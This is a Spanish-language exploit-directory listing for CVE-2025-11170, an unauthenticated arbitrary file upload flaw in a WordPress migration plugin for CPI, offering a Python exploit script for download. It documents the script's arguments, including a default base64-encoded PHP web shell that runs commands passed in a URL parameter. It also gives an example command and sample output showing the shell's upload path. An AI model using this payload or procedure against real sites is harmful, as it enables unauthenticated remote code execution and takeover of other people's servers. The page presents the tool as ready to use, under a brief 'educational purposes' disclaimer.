Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-11170 — Plugin de migración de WP para CPI <= 1.0.2 - Subida arbitraria de archivos sin autenticación | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-11170
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-11170

CVE-2025-11170

Plugin de migración de WP para CPI <= 1.0.2 - Subida arbitraria de archivos sin autenticación

Ver Repositorio
2hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - Carga arbitraria de archivos no autenticada

🚀 WP移行専用プラグイン for CPI <= 1.0.2 - Carga arbitraria de archivos no autenticada

📝 Descripción

El plugin WP移行専用プラグイン for CPI para WordPress es vulnerable a la carga arbitraria de archivos debido a la falta de validación del tipo de archivo en la función Cpiwm_Import_Controller::import en todas las versiones hasta la 1.0.2 inclusive.
Esto permite a atacantes no autenticados cargar archivos arbitrarios en el servidor del sitio afectado, lo que potencialmente permite la ejecución remota de código.

🛡️ Detalles de la vulnerabilidad

  • CVE: CVE-2025-11170
  • Puntuación CVSS: 9.8 (Crítica)
  • Vector de ataque: Carga remota de archivos no autenticada

⚡ Información del script

  • Nombre del script: CVE-2025-11170.py
  • Propósito: Exploit automatizado de carga de shell/archivos para el plugin de migración CPI vulnerable de WordPress.

🔧 Uso

Argumentos

ArgumentoDescripción
-u, --urlURL base del objetivo (p. ej., http://target.com/wordpress/). El script añade wp-admin/admin-ajax.php automáticamente.
-f, --filenameNombre del shell o archivo a cargar. Por defecto: shell.php
-d, --dataContenido del archivo en base64 (o texto plano). Por defecto: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
-i, --indexValor del campo índice. Por defecto: 0
-H, --headersCabeceras HTTP adicionales (formato: X-Key:Value;K2:Value2)
-t, --timeoutTiempo de espera para la solicitud HTTP (segundos). Por defecto: 10
--retriesNúmero de reintentos. Por defecto: 3
--backoffFactor de retroceso entre reintentos (segundos). Por defecto: 0.7
-v, --verboseAumenta la verbosidad para depuración (repetible)

🚦 Métodos explicados

  • Nxploited_parse_args
    Analiza y valida los argumentos de entrada. Asegura la estructura de endpoint correcta, las cabeceras y la codificación de datos.

  • Nxploited_logging
    Configura registro avanzado y verbosidad para una salida detallada o mínima en tiempo de ejecución.

  • Nxploited_retry_session
    Inicializa una sesión persistente con lógica de reintentos y retroceso para comunicaciones resilientes.

  • Nxploited_build_payload
    Construye los parámetros de la solicitud POST para la explotación.

  • Nxploited_send
    Realiza la solicitud POST real al endpoint vulnerable y gestiona respuestas/errores.

  • Nxploited_output_result
    Procesa y formatea la respuesta, mostrando la ruta del shell en caso de éxito, o información de depuración en caso contrario.


💡 Ejemplo de uso

python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"

Salida de ejemplo:

Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited

🚨 Aviso legal

Este script se proporciona solo con fines educativos.
El uso de este exploit en objetivos sin la autorización adecuada puede ser ilegal.
El autor no asume NINGUNA responsabilidad por cualquier uso indebido, daños o consecuencias legales.


📢 Contáctame

GitHub: Nxploited
Telegram: KNxploited


Por: Nxploited ( Khaled Alenazi )

Descargar herramienta